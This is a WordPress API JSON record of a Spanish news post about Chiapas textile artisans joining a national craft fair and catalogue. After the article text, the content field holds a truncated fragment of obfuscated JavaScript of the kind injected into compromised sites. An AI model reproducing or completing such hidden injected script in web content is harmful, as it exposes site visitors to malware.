{"id":12611,"date":"2023-11-14T03:54:51","date_gmt":"2023-11-14T03:54:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12611"},"modified":"2023-11-14T03:54:52","modified_gmt":"2023-11-14T03:54:52","slug":"artesanos-chiapanecos-apareceran-en-el-catalogo-nacional-de-arte-textil","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12611","title":{"rendered":"Artesanos chiapanecos aparecer\u00e1n en el Cat\u00e1logo Nacional de Arte Textil"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"581\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG-20231113-WA0355-1024x581.jpg\" alt=\"\" class=\"wp-image-12612\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG-20231113-WA0355-1024x581.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG-20231113-WA0355-300x170.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG-20231113-WA0355-768x436.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG-20231113-WA0355.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas-. Chiapas contar\u00e1 con la participaci\u00f3n de 50 artesanos en el III Encuentro de Arte Textil Mexicano que se celebrar\u00e1 del 16 al 19 de noviembre en la Ciudad de M\u00e9xico, d\u00f3nde tambi\u00e9n se dar\u00e1 a conocer su trabajo apareciendo por primera vez en el Cat\u00e1logo Nacional inform\u00f3 Yesenia Jim\u00e9nez, titular de la Direcci\u00f3n de Cultura del Ayuntamiento de esta ciudad.Acompa\u00f1ada por el artesano Gilberto N\u00fa\u00f1ez, qui\u00e9n viajar\u00e1 por segunda vez a este encuentro que re\u00fane a artesanos de todo el pa\u00eds en el Complejo Cultural Los Pinos, coment\u00f3 que se va exponer el arte textil que se trabaja en San Crist\u00f3bal de Las Casas y en municipios vecinos de la Regi\u00f3n Altos.&#8221;Son varias las actividades que se realizan en este encuentro, afortunadamente van otras personas de municipios aleda\u00f1os, se organizan pasarelas, foros, la expo venta, lo cual es muy importante porque resalta todo lo que se est\u00e1 haciendo en varias partes del pa\u00eds. Por su parte, Gilberto N\u00fa\u00f1ez, se\u00f1al\u00f3 que van a exhibir los productos que hacen en telar, sobre todo lo que se hace en San Crist\u00f3bal, que ya no es mucho, por lo que se encuentran rescatando el oficio del telar de pedal, &#8220;vamos a representar a nuestro municipio de la mejor forma, cada a\u00f1o participo tambi\u00e9n en varios concursos&#8221;.Por \u00faltimo, dijo que por primera vez van a estar en el Cat\u00e1logo Nacional, &#8220;nos van a entregar un ejemplar donde va aparecer nuestro trabajo y vamos a recibir un ejemplar por parte de la Secretar\u00eda de Cultura, el a\u00f1o pasado asistimos alrededor de 2 mil artesanos, ahora creo ser\u00e1n unos 2 mil 500 y vamos a exhibir miles de productos&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas-. Chiapas contar\u00e1 con la participaci\u00f3n de 50 artesanos en el III Encuentro de Arte Textil Mexicano que se celebrar\u00e1 del 16 al 19 de noviembre en la Ciudad de M\u00e9xico, d\u00f3nde tambi\u00e9n se dar\u00e1 a conocer su trabajo apareciendo por primera vez en el Cat\u00e1logo Nacional inform\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12612,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12611","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12611","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12611"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12611\/revisions"}],"predecessor-version":[{"id":12613,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12611\/revisions\/12613"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12612"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12611"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12611"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}